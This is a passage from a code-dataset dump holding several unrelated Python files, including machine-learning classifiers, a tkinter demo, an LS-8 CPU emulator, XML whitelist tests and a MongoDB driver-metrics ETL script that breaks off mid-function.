(True)\neh_primo(n)\n","sub_path":"backup/user_055/ch31_2020_03_14_00_52_00_602211.py","file_name":"ch31_2020_03_14_00_52_00_602211.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"182694693","text":"\nfrom warnings import simplefilter; simplefilter(action='ignore', category=FutureWarning)\nfrom sklearn.model_selection import train_test_split as tts\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nfrom sklearn.ensemble import AdaBoostClassifier as ADABC\nimport pandas as pd\n\n# ---Dataframe Initialization---\nlabels = ( 'age', 'workclass', 'fnlwgt', 'education', 'education-num', 'marital-status', 'occupation', 'relationship', 'race', 'sex',\n           'capital-gain', 'capital-loss', 'hours-per-week', 'native-country', 'income-status' )\ndf = pd.read_csv('adult.csv', names=labels, skipinitialspace=True)\n\n# ---Preprocessing---\n# Replace missing entries with most frequent value in column.\nfor column in 'workclass', 'occupation', 'native-country':\n    df[column].replace(['?'], df[column].mode(), inplace=True)\n\n# Normalize continuous values.\nfor column in 'age', 'education-num', 'capital-gain', 'capital-loss', 'hours-per-week':\n    df[column] /= df[column].max()\n\n# Remove irrelevant metric(s).\nfor column in 'fnlwgt',:\n    df.drop(column, inplace=True, axis='columns')\n\n# Convert qualitative values to 
quantitative values.\ndf = pd.get_dummies(df)\n\n# ---Training & Testing Data---\nfeature_data = df.drop(['income-status_>50K', 'income-status_<=50K'], axis='columns').values\ntarget_data = df['income-status_>50K'].values\n(train_features, test_features, train_targets, test_targets) = tts(feature_data, target_data, train_size=0.67, stratify=target_data)\n\n# ---Fit Data to Training Model---\nmodel = ADABC()\nmodel.fit(train_features, train_targets)\npredicted = model.predict(test_features)\n\n# ---Results!---\nconf_mat = confusion_matrix(test_targets, predicted)\naccuracy = accuracy_score(test_targets, predicted) * 100\nerror_rate = 100.0 - accuracy\nprint('{:>20}{:>24}\\n{:>20}{:>24}'.format('Accuracy', 'Error Rate', accuracy, error_rate))","sub_path":"Census-Classification/census.py","file_name":"census.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"432501992","text":"\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras import backend as K\n\nimg_width, img_height = 128, 128\n\n\n\ntrain_data_dir ='/home/ubuntu/data/Train'\n\nvalidation_data_dir = '/home/ubuntu/data/Validation'\n\ntest_data_dir = '/home/ubuntu/data/Test'\n\nnb_train_samples = 7277\n\nnb_validation_samples = 1301\n\nepochs = 40\n\nbatch_size = 32\n\n\n\n\n\ninput_shape = (img_width, img_height, 1)\n\n\n\n\nmodel = Sequential()\n\nmodel.add(Conv2D(32, (3, 3), input_shape=input_shape, dim_ordering='tf'))\n\nmodel.add(Activation('relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n\n\nmodel.add(Conv2D(32, (3, 3)))\n\nmodel.add(Activation('relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n\n\nmodel.add(Conv2D(64, (3, 3)))\n\nmodel.add(Activation('relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n\n\nmodel.add(Flatten())\n\nmodel.add(Dense(64))\n\nmodel.add(Activation('relu'))\n\nmodel.add(Dropout(0.5))\n\nmodel.add(Dense(3))\n\nmodel.add(Activation('softmax'))\n\n\n\nmodel.compile(loss='categorical_crossentropy',\n\n optimizer='rmsprop',\n\n metrics=['accuracy'])\n\n\n\n# this is the augmentation configuration we will use for training\n\ntrain_datagen = ImageDataGenerator(rescale=1. / 255)\n\n\n\n# this is the augmentation configuration we will use for testing:\n\n# only rescaling\n\nval_datagen = ImageDataGenerator(rescale=1. / 255)\n\ntest_datagen = ImageDataGenerator(rescale=1. 
/ 255)\n\n\n\ntrain_generator = train_datagen.flow_from_directory(\n    train_data_dir,\n\n    target_size=(img_width, img_height),\n\n    batch_size=batch_size,\n    \n    color_mode='grayscale',\n\n    class_mode='categorical')\n\n\n\nvalidation_generator = val_datagen.flow_from_directory(\n\n    validation_data_dir,\n\n    target_size=(img_width, img_height),\n\n    batch_size=batch_size,\n    \n    color_mode='grayscale',\n\n    class_mode='categorical')\n\n\ntest_generator = test_datagen.flow_from_directory(\n\n    test_data_dir,\n\n    target_size=(img_width, img_height),\n\n    batch_size=batch_size,\n    \n    color_mode='grayscale',\n\n    class_mode='categorical')\n\n\nmodel.fit_generator(\n\n    train_generator,\n\n    steps_per_epoch=nb_train_samples // batch_size,\n\n    epochs=epochs,\n\n    validation_data=validation_generator,\n\n    validation_steps=nb_validation_samples // batch_size)\n\n\nscore = model.evaluate_generator(test_generator, 936)\n\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n\nmodel.save_weights('/home/ubuntu/first_try.h5')","sub_path":"CNN_Keras_DL.py","file_name":"CNN_Keras_DL.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"154962964","text":"from node import MongoNode\n\n\nclass MongoReplicaSetMember(MongoNode):\n\n    REPLICA_SET_TEMPLATE = '{group}-rs{set_}'\n\n    def __init__(self, group=None, server_type=None, instance_type=None,\n                 environment=None, ami=None, region=None, role=None,\n                 keypair=None, availability_zone=None,\n                 security_groups=None, block_devices=None,\n                 chef_path=None, subnet_id=None, dns_zones=None,\n                 ingress_groups_to_add=None, ports_to_authorize=None,\n                 classic_link=False, add_route53_dns=True, chef_server_url=None,\n                 replica_set=None, mongodb_version=None):\n\n        super(MongoReplicaSetMember, self).__init__(group, server_type,\n                                                    instance_type,\n                                                    environment, ami, region,\n                                                    role, keypair,\n                                                    availability_zone,\n                                                    security_groups,\n                                                    block_devices, chef_path,\n                                                    subnet_id, dns_zones,\n                                                    ingress_groups_to_add,\n                                                    ports_to_authorize,\n                                                    classic_link,\n                                                    add_route53_dns,\n                                                    chef_server_url,\n                                                    mongodb_version)\n\n        self.replica_set = replica_set\n\n    def set_chef_attributes(self):\n        super(MongoReplicaSetMember, self).set_chef_attributes()\n        replica_set = self.REPLICA_SET_TEMPLATE.format(\n            group=self.group, set_=self.replica_set)\n        self.CHEF_ATTRIBUTES['mongodb']['replicaset_name'] = replica_set\n        self.log.info('Set the replica set name to \"{name}\"'.format(\n            name=replica_set)\n        )\n\n    def configure(self):\n        super(MongoReplicaSetMember, self).configure()\n        self.set_chef_attributes()\n\n        if self.replica_set is None:\n            self.log.warn('No replica set provided')\n            self.replica_set = 1\n\n        self.log.info('Using replica set {set}'.format(set=self.replica_set))\n\n    @property\n    def tags(self):\n\n        tags = super(MongoReplicaSetMember, self).tags\n\n        tags['ReplicaSet'] = self.REPLICA_SET_TEMPLATE.format(\n            group=self.group, set_=self.replica_set\n        )\n\n        return tags\n","sub_path":"tyr/servers/mongo/member.py","file_name":"member.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"307436466","text":"import tkinter as tk\n\nwindows = tk.Tk()\nwindows.title(\"my window\")\nwindows.geometry(\"600x400\")\n# window content starts here\n# l = tk.Label(windows,text='Hello world',bg='green',font=('Arial',12),width=15,height=2)\n# l.pack()\n\ndef insert_point():\n    var = 
Entry.get()\n    Text.insert('insert',var)\n\ndef insert_end():\n    var = Entry.get()\n    Text.insert('end',var)\n\n\nEntry = tk.Entry(windows,show=None)\n\nButton1 = tk.Button(windows,text='insert point',width=15,height=2,command = insert_point)\nButton2 = tk.Button(windows,text='insert end',command = insert_end)\nText = tk.Text(windows,height=2)\n\n\nEntry.pack()\nButton1.pack()\nButton2.pack()\nText.pack()\n# window content ends here\nwindows.mainloop()","sub_path":"tkinter/Entry_Text.py","file_name":"Entry_Text.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"124562455","text":"\"\"\"CPU functionality.\"\"\"\n\nimport sys\n\nHLT = 0b00000001\nLDI = 0b10000010\nPRN = 0b01000111\nMUL = 0b10100010\nPUSH = 0b01000101\nPOP = 0b01000110\nCALL = 0b01010000\nRET = 0b00010001\nADD = 0b10100000\nCMP = 0b10100111\nJMP = 0b01010100\nJEQ = 0b01010101\nJNE = 0b01010110\nAND = 0b10101000\nOR = 0b10101010\nXOR = 0b10101011\nNOT = 0b01101001\nSHL = 0b10101100\nSHR = 0b10101101\nMOD = 0b10100100\n\nsp = 7\n\n\nclass CPU:\n    \"\"\"Main CPU class.\"\"\"\n\n    def __init__(self):\n        \"\"\"Construct a new CPU.\"\"\"\n        self.ram = [0] * 256\n        self.reg = [0] * 8\n        self.pc = 0\n        self.halted = False\n        self.flag = 0b00000000\n\n        self.branchtable = {}\n\n        self.branchtable[HLT] = self.handle_hlt\n        self.branchtable[LDI] = self.handle_ldi\n        self.branchtable[PRN] = self.handle_prn\n        self.branchtable[MUL] = self.handle_mul\n        self.branchtable[PUSH] = self.handle_push\n        self.branchtable[POP] = self.handle_pop\n        self.branchtable[CALL] = self.handle_call\n        self.branchtable[RET] = self.handle_ret\n        self.branchtable[ADD] = self.handle_add\n        self.branchtable[CMP] = self.handle_cmp\n        self.branchtable[JMP] = self.handle_jmp\n        self.branchtable[JEQ] = self.handle_jeq\n        self.branchtable[JNE] = self.handle_jne\n        self.branchtable[AND] = self.handle_and\n        self.branchtable[OR] = self.handle_or\n        self.branchtable[XOR] = self.handle_xor\n        self.branchtable[NOT] = self.handle_not\n        self.branchtable[SHL] = self.handle_shl\n        self.branchtable[SHR] = self.handle_shr\n        self.branchtable[MOD] = self.handle_mod\n        \n        self.reg[7] = self.ram[0xF4]\n\n    def handle_hlt(self):\n        self.halted = True\n    \n    def handle_ldi(self):\n        reg_num = self.ram_read(self.pc + 1)\n        value = self.ram_read(self.pc + 2)\n        self.reg[reg_num] = value\n        self.pc += 3\n    \n    def handle_prn(self):\n        reg_num = self.ram_read(self.pc + 1)\n        print(self.reg[reg_num])\n        self.pc += 2\n    \n    def handle_mul(self):\n        num_1 = self.ram_read(self.pc + 1)\n        num_2 = self.ram_read(self.pc + 2)\n        self.alu(MUL, num_1, num_2)\n        self.pc += 3\n    \n    def handle_push(self):\n        # setup\n        reg_num = self.ram_read(self.pc + 1)\n        value = self.reg[reg_num]\n\n        # push\n        self.reg[sp] -= 1\n        self.ram[self.reg[sp]] = value\n        self.pc += 2\n    \n    def handle_pop(self):\n        # setup\n        reg_num = self.ram_read(self.pc + 1)\n        value = self.ram[self.reg[sp]]\n\n        # pop\n        self.reg[reg_num] = value\n        self.reg[sp] += 1\n        self.pc += 2\n\n    def handle_call(self):\n        reg_num = self.ram_read(self.pc + 1)\n        self.reg[sp] -= 1\n        self.ram[self.reg[sp]] = self.pc + 2\n        self.pc = self.reg[reg_num]\n    \n    def handle_ret(self):\n        self.pc = self.ram[self.reg[sp]]\n        self.reg[sp] += 1\n\n    def handle_add(self):\n        num_1 = self.ram_read(self.pc + 1)\n        num_2 = self.ram_read(self.pc + 2)\n        self.alu(ADD, num_1, num_2)\n        self.pc += 3\n\n    def handle_cmp(self):\n        num_1 = self.ram_read(self.pc + 1)\n        num_2 = self.ram_read(self.pc + 2)\n        self.alu(CMP, num_1, num_2)\n        self.pc += 3\n\n    def handle_jmp(self):\n        reg_num = self.ram_read(self.pc + 1)\n        self.pc = 
self.reg[reg_num]\n\n def handle_jeq(self):\n reg_num = self.ram_read(self.pc + 1)\n if self.flag == 1:\n self.pc = self.reg[reg_num]\n else:\n self.pc += 2\n\n def handle_jne(self):\n reg_num = self.ram_read(self.pc + 1)\n if self.flag != 1:\n self.pc = self.reg[reg_num]\n else:\n self.pc += 2\n \n def handle_and(self):\n num_1 = self.ram_read(self.pc + 1)\n num_2 = self.ram_read(self.pc + 2)\n self.alu(AND, num_1, num_2)\n self.pc += 3\n \n def handle_or(self):\n num_1 = self.ram_read(self.pc + 1)\n num_2 = self.ram_read(self.pc + 2)\n self.alu(OR, num_1, num_2)\n self.pc += 3\n\n def handle_xor(self):\n num_1 = self.ram_read(self.pc + 1)\n num_2 = self.ram_read(self.pc + 2)\n self.alu(XOR, num_1, num_2)\n self.pc += 3\n \n def handle_not(self):\n num_1 = self.ram_read(self.pc + 1)\n self.alu(NOT, num_1, None)\n self.pc += 2\n \n def handle_shl(self):\n num_1 = self.ram_read(self.pc + 1)\n num_2 = self.ram_read(self.pc + 2)\n self.alu(SHL, num_1, num_2)\n self.pc += 3\n \n def handle_shr(self):\n num_1 = self.ram_read(self.pc + 1)\n num_2 = self.ram_read(self.pc + 2)\n self.alu(SHR, num_1, num_2)\n self.pc += 3\n\n def handle_mod(self):\n num_1 = self.ram_read(self.pc + 1)\n num_2 = self.ram_read(self.pc + 2)\n self.alu(MOD, num_1, num_2)\n self.pc += 3\n\n\n def ram_read(self, address):\n return self.ram[address]\n\n def ram_write(self, address, value):\n self.ram[address] = value\n \n\n def load(self, prog_name):\n \"\"\"Load a program into memory.\"\"\"\n try:\n address = 0\n prog_name = sys.argv[1]\n with open(prog_name) as f:\n for line in f:\n comment_split = line.split(\"#\")[0]\n num = comment_split.strip()\n \n if num == \"\":\n continue\n\n val = int(num, 2)\n self.ram[address] = val\n address += 1\n \n except FileNotFoundError:\n print(\"file not found\")\n sys.exit(2)\n\n def alu(self, op, reg_a, reg_b):\n \"\"\"ALU operations.\"\"\"\n\n if op == ADD:\n self.reg[reg_a] += self.reg[reg_b]\n #elif op == \"SUB\": etc\n elif op == MUL:\n self.reg[reg_a] *= self.reg[reg_b]\n elif op == CMP:\n if self.reg[reg_a] == self.reg[reg_b]:\n self.flag = 0b00000001\n elif self.reg[reg_a] < self.reg[reg_b]:\n self.flag = 0b00000100\n elif self.reg[reg_a] > self.reg[reg_b]:\n self.flag = 0b00000010\n elif op == AND:\n self.reg[reg_a] = self.reg[reg_a] & self.reg[reg_b]\n \n elif op == OR:\n self.reg[reg_a] = self.reg[reg_a] | self.reg[reg_b]\n \n elif op == XOR:\n self.reg[reg_a] = self.reg[reg_a] ^ self.reg[reg_b]\n \n elif op == NOT:\n self.reg[reg_a] = ~self.reg[reg_a]\n \n elif op == SHL:\n self.reg[reg_a] = self.reg[reg_a] << self.reg[reg_b]\n\n elif op == SHR:\n self.reg[reg_a] = self.reg[reg_a] >> self.reg[reg_b]\n \n elif op == MOD:\n if self.reg[reg_b] == 0:\n print(\"Can't divide by a number which is 0\")\n self.handle_hlt()\n else:\n self.reg[reg_a] = self.reg[reg_a] % self.reg[reg_b]\n else:\n raise Exception(\"Unsupported ALU operation\")\n\n \n\n def trace(self):\n \"\"\"\n Handy function to print out the CPU state. 
You might want to call this\n from run() if you need help debugging.\n \"\"\"\n\n print(f\"TRACE: %02X | %02X %02X %02X |\" % (\n self.pc,\n # self.fl,\n #self.ie,\n self.ram_read(self.pc),\n self.ram_read(self.pc + 1),\n self.ram_read(self.pc + 2)\n ), end='')\n\n for i in range(8):\n print(\" %02X\" % self.reg[i], end='')\n\n print()\n\n def run(self):\n \"\"\"Run the CPU.\"\"\"\n \n\n while not self.halted:\n ir = self.ram[self.pc]\n\n if ir is None:\n print(\"I did not understand this command\")\n sys.exit(1)\n\n self.branchtable[ir]()\n ","sub_path":"ls8/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":7886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"106597556","text":"# pylint: skip-file\nfrom typing import Any, AnyStr\nfrom unittest import TestCase\nfrom unittest.mock import patch, MagicMock\nimport lxml\n\nimport medmij\nfrom . import testdata\n\n\ndef string_urlopen(response_string: AnyStr) -> Any:\n response = MagicMock()\n response.__enter__.return_value = response\n response.getcode.return_value = 200\n response.read.return_value = response_string\n return response\n\n\nclass TestWhitelist(TestCase):\n def test_parse_ok(self) -> None:\n for xml in (testdata.WHITELIST_EXAMPLE_XML,\n testdata.WHITELIST_EXAMPLE_SINGLE_XML):\n whitelist = medmij.Whitelist(xml)\n self.assertTrue(isinstance(whitelist, medmij.Whitelist))\n\n def test_parse_invalid_xml(self) -> None:\n with self.assertRaises(lxml.etree.XMLSyntaxError):\n medmij.Whitelist(' None:\n for xml in (testdata.WHITELIST_XSD_FAIL1,\n testdata.WHITELIST_XSD_FAIL2):\n with self.assertRaises(lxml.etree.XMLSyntaxError):\n medmij.Whitelist(xml)\n\n def test_whitelist_contains(self) -> None:\n whitelist = medmij.Whitelist(testdata.WHITELIST_EXAMPLE_XML)\n self.assertIn(\"rcf-rso.nl\", whitelist)\n self.assertNotIn(\"rcf-rso.nl.\", whitelist)\n self.assertNotIn(\"RFC-RSO.NL\", whitelist)\n self.assertNotIn(None, whitelist)\n\n def test_whitelist_download(self) -> None:\n with patch('urllib.request.urlopen') as mock_urlopen:\n mock_urlopen.return_value = string_urlopen(\n testdata.WHITELIST_EXAMPLE_XML)\n whitelist = medmij.Whitelist.from_url(\"http://example.com/\")\n self.assertIsInstance(whitelist, medmij.Whitelist)\n","sub_path":"medmij/tests/test_whitelist.py","file_name":"test_whitelist.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"409280158","text":"#!/usr/bin/env python\n\nimport argparse\nimport os\nimport pandas as pd\nimport numpy as np\nimport pymongo\nimport dns\nfrom bson.objectid import ObjectId\nimport datetime\nimport pprint\nimport re\nimport yaml\nfrom datetime import timezone, datetime, tzinfo, date,time, timedelta\nimport pdb\nimport logging\nimport time\n\nlogging.basicConfig(filename='drivers_metrics.log',level=logging.INFO)\n\n#root_dir = os.path.abspath(os.path.join(__file__, '../..'))\n\n\nMAX_DELTA = 1\nINTERNAL_TOOLS_COLLECTION = \"stats_internal_daily\"\nEXTERNAL_APPS_COLLECTION = 'stats_external_daily'\n\ndef internal_apps_regex():\n regex = re.compile(r\"(stitch\\||mongosqld|mongodrdl|MongoDB Automation Agent|MongoDB Atlas|MongoDB Compass|mongoimport|mongoexport|mongodump|mongorestore|mongomirror|MongoDB PIT|MongoDB CPS|MongoDB Backup|MongoDB Monitoring)\")\n return regex\n\n\ndef today_midnight():\n today = datetime.today()\n today_midnight = datetime(today.year, today.month, today.day,tzinfo=timezone.utc)\n return 
today_midnight\n\ndef get_date(date_string):\n date_from_string = datetime.strptime(date_string, '%Y%m%d')\n date_midnight = datetime(date_from_string.year,date_from_string.month,date_from_string.day, tzinfo=timezone.utc)\n return date_midnight\n\ndef end_date(days=0):\n return today_midnight() - timedelta(days)\n\ndef start_and_end_date(end_date_string=None,start_date_string=None):\n end_date = get_date(end_date_string)\n start_date = get_date(start_date_string)\n return (start_date,end_date)\n\ndef default_start_end_date(collection):\n pipeline = [\n {\n '$group': {\n '_id': None,\n 'max': {\n '$max': '$ts'\n }\n }\n }, {\n '$project': {\n 'max': 1,\n '_id': 0\n }\n }\n ]\n last_date = run_aggregation(collection,pipeline)[0]['max']\n last_date_midnight = datetime(last_date.year,last_date.month,last_date.day, tzinfo=timezone.utc)\n print('max found date midnight: %s' % last_date_midnight)\n start_date = last_date_midnight+timedelta(1)\n end_date = today_midnight()\n return (start_date,end_date)\n\ndef java_driver_names():\n return [\n 'mongo-java-driver',\n 'mongo-java-driver|mongo-java-driver-reactivestreams',\n 'mongo-java-driver|mongo-java-driver-rx',\n 'mongo-java-driver|mongo-scala-driver',\n 'mongo-java-driver|sync',\n 'mongo-java-driver|legacy',\n 'mongo-java-driver|async',\n 'mongo-java-driver|async|mongo-java-driver-reactivestreams',\n 'mongo-java-driver|async|mongo-scala-driver'\n ]\n\ndef other_drivers_names():\n return [\n 'mgo',\n 'mongo-csharp-driver',\n 'mongo-go-driver',\n 'mongo-ruby-driver',\n 'mongo-rust-driver-prototype',\n 'mongo-rust-driver',\n 'mongoc',\n 'mongoc / ext-mongodb:HHVM',\n 'mongoc / ext-mongodb:PHP',\n 'mongoc / mongocxx',\n 'mongoc / MongoSwift',\n 'MongoDB Perl Driver',\n 'MongoKitten',\n 'nodejs',\n 'nodejs-core',\n 'PyMongo',\n 'PyMongo|Motor',\n 'PyMongo|PyMODM',\n 'nodejs|Mongoose',\n 'mongo-java-driver|mongo-spark',\n 'mongo-java-driver|legacy|mongo-spark',\n 'mongo-java-driver|sync|mongo-kafka'\n ]\n\ndef driver_names():\n return java_driver_names() + other_drivers_names()\n\ndef driver_name_condition():\n return list(map(lambda x: {'entries.raw.driver.name': x}, driver_names()))\n\ndef pipeline_drivers(start_date,end_date):\n pipeline = [\n {\n '$match': {\n 'rt': {\n '$gte': start_date,\n '$lt': end_date\n }\n }\n }, {\n '$unwind': {\n 'path': '$entries',\n 'preserveNullAndEmptyArrays': False\n }\n }, {\n '$match': {\n '$or': driver_name_condition()\n }\n }, {\n '$project': {\n 'ts': '$rt',\n 'd': '$entries.raw.driver.name',\n 'dv': '$entries.raw.driver.version',\n 'ts': '$rt',\n 'gid': '$gid',\n 'os': '$entries.raw.os.name',\n 'osa': '$entries.raw.os.architecture',\n 'osv': '$entries.raw.os.version',\n 'a': '$entries.raw.application.name',\n 'p': '$entries.raw.platform',\n 'sv': '$mv',\n 'day': {'$dayOfMonth': '$rt'},\n 'month': {'$month': '$rt'},\n 'year': {'$year': '$rt'},\n }\n },{\n '$group': {\n '_id': {\n 'd': '$d',\n 'dv': '$dv',\n 'gid': '$gid',\n 'os': '$os',\n 'osa': '$osa',\n 'osv': '$osv',\n 'p': '$p',\n 'a': '$a',\n 'sv': '$sv',\n 'day': '$day',\n 'month': '$month',\n 'year': '$year'\n },\n 'ts': {\n '$last': '$ts'\n }\n }\n }, {\n '$project': {\n 'd': '$_id.d',\n 'dv': '$_id.dv',\n 'gid': '$_id.gid',\n 'os': '$_id.os',\n 'osa': '$_id.osa',\n 'osv': '$_id.osv',\n 'p': '$_id.p',\n 'a': '$_id.a',\n 'sv': '$_id.sv',\n 'day': '$_id.day',\n 'month': '$_id.month',\n 'year': '$_id.year',\n 'ts': 1,\n '_id': 0\n }\n }\n ]\n return pipeline\n\ndef pipeline_external_apps():\n pipeline = [\n {\n '$group': {\n '_id': {\n 'd': '$d',\n 'dv': 
'$dv',\n 'gid': '$gid',\n 'sv': '$sv',\n 'day': '$day',\n 'p': '$p',\n 'month': '$month',\n 'year': '$year',\n 'lver': '$lver',\n 'prov': '$prov',\n 'fr': '$fr',\n 'os': '$os',\n 'osa': '$osa',\n 'osv': '$osv'\n },\n 'ts': {\n '$max': '$ts'\n }\n }\n }, {\n '$project': {\n 'ts': 1,\n 'd': '$_id.d',\n 'dv': '$_id.dv',\n 'gid': '$_id.gid',\n 'sv': '$_id.sv',\n 'p': '$_id.p',\n 'day': '$_id.day',\n 'month': '$_id.month',\n 'year': '$_id.year',\n 'lver': '$_id.lver',\n 'fr': '$_id.fr',\n 'prov': '$_id.prov',\n 'os': '$_id.os',\n 'osa': '$_id.osa',\n 'osv': '$_id.osv',\n '_id': 0\n }\n }\n]\n return pipeline\n\ndef run_aggregation(collection,pipeline,maxMS=10000000,allowDisk=True):\n return list(collection.aggregate(pipeline,maxTimeMS = maxMS,allowDiskUse=allowDisk))\n\ndef language_version_and_framework(doc):\n language_version = None\n framework = None\n provider = None\n driver_name = doc['d']\n if 'p' in doc:\n try:\n platform_name = doc['p']\n if driver_name in ['PyMongo','PyMongo|Motor']:\n split_str = re.split(r'\\|',platform_name)\n language_version = re.sub(r'\\.(final|candidate)\\.\\d','',split_str[0]).replace(' ','') # TODO: PyPy and Python version?\n framework = (None if (len(split_str) == 1) else split_str[1].replace(' ','')) #TODO: tornado version?\n elif driver_name in ['nodejs','nodejs-core']:\n #'Node.js v8.11.3, LE, mongodb-core: 3.2.5'\n split_str = platform_name.replace('Node.js v','').split(',')\n language_version = split_str[0]\n elif driver_name == 'mongo-go-driver':\n #go1.10.8\n language_version = platform_name.replace('go','')\n elif driver_name in java_driver_names():\n if driver_name == 'mongo-java-driver|mongo-scala-driver':\n #'Java/Oracle Corporation/1.8.0_202-b08|Scala/2.12.6'\n #TODO: confirm if need versions for both java and scala\n split_str = platform_name.replace('|','/').split('/')\n language_version = { 'java': split_str[2], 'scala': split_str[4]}\n else:\n #Java/Oracle Corporation/1.8.0_181-b15\n language_version = platform_name.split('/')[2]\n provider = platform_name.split('/')[1]\n elif driver_name == 'mongo-ruby-driver':\n #'mongoid-6.3.0, 2.5.1, x86_64-linux-musl, x86_64-pc-linux-musl',\n # '2.4.6, x86_64-linux, x86_64-pc-linux-gnu'\n #TODO\n split_str = platform_name.split(',')\n if platform_name.find('mongoid') > -1:\n framework = split_str[0]\n language_version = split_str[1]\n else:\n language_version = split_str[0]\n elif driver_name == 'MongoDB Perl Driver':\n #Perl v5.18.2 x86_64-linux-gnu-thread-multi\n language_version = platform_name.split(' ')[1].replace('v','')\n elif driver_name == \"mongo-csharp-driver\":\n #Mono 5.14.0 (explicit/969357ac02b)\n #.NET Core 4.6.26926.01\n #NET Framework 4.6.1586.0\n pattern = r'.?([a-zA-Z]+ )+' # find 1 or more words that do not contain numbers\n framework = {\n 'fname': re.search(pattern,platform_name).group(0).rstrip(),\n 'fv': re.sub(pattern,'',platform_name).split(' ')[0]\n }\n else:\n pass\n if language_version is not None:\n doc['lver'] = language_version\n if framework is not None:\n doc['fr'] = framework\n if provider is not None:\n doc['prov'] = provider\n\n except Exception as e:\n logging.error(\"Exception %s for doc with platform string %s\",e,platform_name)\n print(\"error detected\")\n else:\n logging.info(\"Document with driver name %s did not have platform field\",driver_name)\n return doc\n\ndef process_all_docs(docs):\n for doc in docs:\n process_doc(doc)\n\ndef update_list_with_lang_ver_framework(docs):\n result = list(map(lambda x: language_version_and_framework(x), docs))\n return 
result\n\ndef prod_connection_string(username,password):\n return \"mongodb://{}:{}@datawarehouseprod-shard-00-00-coq6x.mongodb.net:27017,datawarehouseprod-shard-00-01-coq6x.mongodb.net:27017,datawarehouseprod-shard-00-02-coq6x.mongodb.net:27017/test?ssl=true&replicaSet=DataWarehouseProd-shard-0&authSource=admin\".format(username,password)\n\ndef postprocessing_connection_string(username,password):\n return \"mongodb+srv://{}:{}@cluster0-ee68b.mongodb.net/test\".format(username,password)\n\ndef function_with_time_elapsed(message):\n def decorator(function):\n def wrapper(*args,**kwargs):\n start_time = datetime.today()\n res = function(*args,**kwargs)\n end_time = datetime.today()\n time_elapsed = end_time - start_time\n print(\"{}_{}\".format(message,time_elapsed))\n return res\n return wrapper\n return decorator\n\ndef group_external_apps(list):\n df = pd.DataFrame(list)\n if 'a' in df.columns:\n df = df.drop(columns=['a'])\n df = df.replace('', ' ', regex = True)\n df = df.replace(np.nan, '', regex = True)\n df = df.groupby(['d','p','month','day','year','sv','dv','os','osa','osv','gid'],as_index=False).max().drop_duplicates()\n df = df.replace({'': None})\n df = df.replace(' ', '')\n d_dict = df.to_dict('r')\n return d_dict\n\n\n\ndef etl(start_date,end_date):\n #pdb.set_trace()\n #extract\n client = mdb_client_dw_prod()\n raw_metadata = get_raw_client_metadata(client)\n print(pipeline_drivers(start_date,end_date))\n logging.info(pipeline_drivers(start_date,end_date))\n start_time = datetime.today()\n docs = run_aggregation(raw_metadata,pipeline_drivers(start_date,end_date))\n end_time = datetime.today()\n time_elapsed = end_time - start_time\n print(\"aggregation took {}\".format(time_elapsed))\n print(\"start parsing:\")\n start_time = datetime.today()\n if len(docs) > 0:\n #transform\n internal_list = [doc for doc in docs if ('a' in doc.keys() and internal_apps_regex().search(doc['a']))]\n external_list = filter(lambda i: i not in internal_list, docs)\n external_list = group_external_apps(external_list)\n external_list = update_list_with_lang_ver_framework(external_list)\n #load\n end_time = datetime.today()\n time_elapsed = end_time - start_time\n print(\"parsing took {}\".format(time_elapsed))\n print(\"inserting internal tools:\")\n if len(internal_list) > 0:\n internal_collection.insert_many(internal_list)\n print(\"inserting external apps:\")\n start_time = datetime.today()\n external_collection.insert_many(external_list)\n end_time = datetime.today()\n time_elapsed = end_time - start_time\n print(\"insert took {}\".format(time_elapsed))\n #logging.info(\"inserted %s docs\",len(external_list))\n else:\n logging.info(\"no docs. 
Check original dataset\")\n client.close()\n print(\"Done.\")\n\ndef etl_external_drivers():\n pipeline = pipeline_external_apps()\n print(pipeline)\n start_time = datetime.today()\n docs = run_aggregation(staging_collection,pipeline)\n end_time = datetime.today()\n time_elapsed = end_time - start_time\n print(\"aggregation took {}\".format(time_elapsed))\n external_collection.insert_many(docs)\n\n\n#db.drivers_stats.dropIndex(\"app_name_text\"); db.drivers_stats.createIndex({a: \"text\", ts: 1},{name: \"app_ts_text_compound\"});\n\n\ndef query_delete_many(start_date,end_date,collection):\n query = {\n 'a': {\n '$not': internal_apps_regex()\n },\n 'ts': {\n '$gte': start_date,\n '$lt': end_date,\n }\n }\n result = collection.deleteMany(query)\n return result\n\ndef get_secrets():\n stream = open('secrets.yml', 'r')\n secrets = yaml.load(stream)\n username_dw_prod, pw_dw_prod, u_postprocessing, pw_postprocessing = (secrets['u_dw_prod'],secrets['pw_dw_prod'],secrets['u_postprocessing'],secrets['pw_postprocessing'])\n return (username_dw_prod, pw_dw_prod, u_postprocessing, pw_postprocessing)\n\ndef mdb_client_dw_prod():\n u_dw_prod, pw_dw_prod, u_dw_postproc, p_dw_postproc = get_secrets()\n prod = pymongo.MongoClient(prod_connection_string(u_dw_prod,pw_dw_prod),\n socketTimeoutMS = 3600000)\n return prod\n\ndef get_raw_client_metadata(client):\n dw_raw = client.dw_raw\n raw_metadata_collection = dw_raw['cloud__cloud_backend__rawclientmetadata']\n return raw_metadata_collection\n\ndef 